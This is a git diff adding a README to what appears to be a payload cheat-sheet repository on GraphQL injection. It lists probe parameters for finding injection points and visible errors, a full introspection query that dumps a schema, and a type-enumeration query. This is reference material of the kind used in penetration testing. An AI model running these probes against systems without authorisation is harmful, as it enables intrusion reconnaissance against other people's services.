diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md new file mode 100644 index 0000000..c997161 --- /dev/null +++ b/GraphQL Injection/README.md @@ -0,0 +1,130 @@ +# GraphQL injection + +GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. + +## Exploit + +Identify an injection point + +``` +?param={__schema{types{name}}} +``` +Check if errors are visible + +``` +?param={__schema} +?param={} +?param={thisdefinitelydoesnotexist} +``` + +Enumerate Database Schema with the following GraphQL query + +``` +fragment FullType on __Type { + kind + name + description + fields(includeDeprecated: true) { + name + description + args { + ...InputValue + } + type { + ...TypeRef + } + isDeprecated + deprecationReason + } + inputFields { + ...InputValue + } + interfaces { + ...TypeRef + } + enumValues(includeDeprecated: true) { + name + description + isDeprecated + deprecationReason + } + possibleTypes { + ...TypeRef + } +} +fragment InputValue on __InputValue { + name + description + type { + ...TypeRef + } + defaultValue +} +fragment TypeRef on __Type { + kind + name + ofType { + kind + name + ofType { + kind + name + ofType { + kind + name + ofType { + kind + name + ofType { + kind + name + ofType { + kind + name + ofType { + kind + name + } + } + } + } + } + } + } +} + +query IntrospectionQuery { + __schema { + queryType { + name + } + mutationType { + name + } + types { + ...FullType + } + directives { + name + description + locations + args { + ...InputValue + } + } + } +} + +``` + +Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type + +``` +{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}} +``` + +## References + +* [Introduction to GraphQL](https://graphql.org/learn/) +* [GraphQL Introspection](https://graphql.org/learn/introspection/) +